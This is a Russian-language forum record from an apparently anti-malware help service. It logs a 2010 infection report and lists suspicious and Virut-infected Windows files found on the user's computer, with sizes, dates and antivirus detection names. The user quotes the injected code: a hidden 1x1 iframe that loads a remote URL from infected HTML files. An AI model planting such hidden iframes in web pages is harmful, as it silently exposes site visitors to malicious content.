Пользователь обратился в сервис 911, указав на следующие проблемы в работе его компьютера:
Код вируса находится в html файлах и блокирует нормальную работу сайтов.
<iframe src="http://NtKrnlpa.inf*/rc/?i=1" width=1 height=1 style="border:0"></iframe>
Дата обращения: 13.08.2010 14:27:33
Номер заявки: 27199
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
13.08.2010 15:00:28 на зараженном компьютере были обнаружены следующие вредоносные файлы:
- C:\WINDOWS\inf\unregmp2.exe - подозрительный, обрабатывается вирлабом
- размер: 318464 байт
- дата файла: 13.08.2010 14:38:22
- версия: "11.0.5721.5235 (WMP_11.070626-2109)"
- копирайты: "(C) Корпорация Майкрософт. Все права защищены."
- C:\WINDOWS\PCHealth\HelpCtr\Binaries\HelpCtr.exe - подозрительный, обрабатывается вирлабом
- размер: 769024 байт
- дата файла: 13.08.2010 14:39:14
- версия: "5.1.2600.5512 (xpsp.080413-2108)"
- копирайты: "© Microsoft Corporation. All rights reserved."
- C:\WINDOWS\system32\cmd.exe - подозрительный, обрабатывается вирлабом
- размер: 402944 байт
- дата файла: 13.08.2010 14:40:10
- версия: "5.1.2600.5512 (xpsp.080413-2111)"
- копирайты: "© Корпорация Майкрософт. Все права защищены."
- c:\windows\system32\cthelper.exe - Virus.Win32.Virut.av
- размер: 26624 байт
- дата файла: 18.03.2010 22:17:48
- версия: "6.00.01.1377-2.18.6580"
- копирайты: "Copyright (C) 2004-2007"
- детект других антивирусов: DrWEB 5.0: Зловред Win32.Virut.30; VBA32: Зловред Virus.Win32.Virut.2; BitDefender: Зловред Win32.Virtob.8.Gen; NOD32: Зловред Win32/Virut.AV virus; Avast4: Зловред Win32:Virtob
- C:\WINDOWS\system32\imapi.exe - подозрительный, обрабатывается вирлабом
- размер: 150528 байт
- дата файла: 13.08.2010 14:38:04
- версия: "5.1.2600.5512 (xpsp.080413-2105)"
- копирайты: "© Корпорация Майкрософт. Все права защищены."
- C:\WINDOWS\system32\NeroCheck.exe - подозрительный, обрабатывается вирлабом
- размер: 155648 байт
- дата файла: 13.08.2010 14:37:16
- версия: "1, 0, 0, 5"
- копирайты: "Copyright (c) 1995-2006 Nero AG and its licensors"
- C:\WINDOWS\system32\regsvr32.exe - подозрительный, обрабатывается вирлабом
- размер: 12288 байт
- дата файла: 13.08.2010 14:38:22
- версия: "5.1.2600.5512 (xpsp.080413-2105)"
- копирайты: "© Корпорация Майкрософт. Все права защищены."
- c:\windows\system32\rundll32.exe - Virus.Win32.Virut.av
- размер: 40448 байт
- дата файла: 15.04.2008 17:00:00
- версия: "5.1.2600.5512 (xpsp.080413-2105)"
- копирайты: "© Корпорация Майкрософт. Все права защищены."
- детект других антивирусов: DrWEB 5.0: Зловред Win32.Virut.30; VBA32: Зловред Virus.Win32.Virut.2; BitDefender: Зловред Win32.Virtob.8.Gen; NOD32: Зловред Win32/Virut.AV virus; Avast4: Зловред Win32:Virtob
- c:\windows\system32\spoolsv.exe - Virus.Win32.Virut.av
- размер: 65024 байт
- дата файла: 15.04.2008 17:00:00
- версия: "5.1.2600.5512 (xpsp.080413-0852)"
- копирайты: "© Microsoft Corporation. All rights reserved."
- детект других антивирусов: DrWEB 5.0: Зловред Win32.Virut.30; VBA32: Зловред Virus.Win32.Virut.2; BitDefender: Зловред Win32.Virtob.7.Gen; NOD32: Зловред Win32/Virut.AV virus; Avast4: Зловред Win32:Virtob
- C:\WINDOWS\System32\userinit.exe - подозрительный, обрабатывается вирлабом
- размер: 26624 байт
- дата файла: 13.08.2010 14:36:36
- версия: "5.1.2600.5512 (xpsp.080413-2113)"
- копирайты: "© Корпорация Майкрософт. Все права защищены."
- C:\Program Files\Messenger\msmsgs.exe - подозрительный, обрабатывается вирлабом
- размер: 1695232 байт
- дата файла: 13.08.2010 14:37:30
- версия: "4.7.3001"
- копирайты: "Copyright (c) Microsoft Corporation 2004"
Ваши права в разделе
Ответить с цитированием
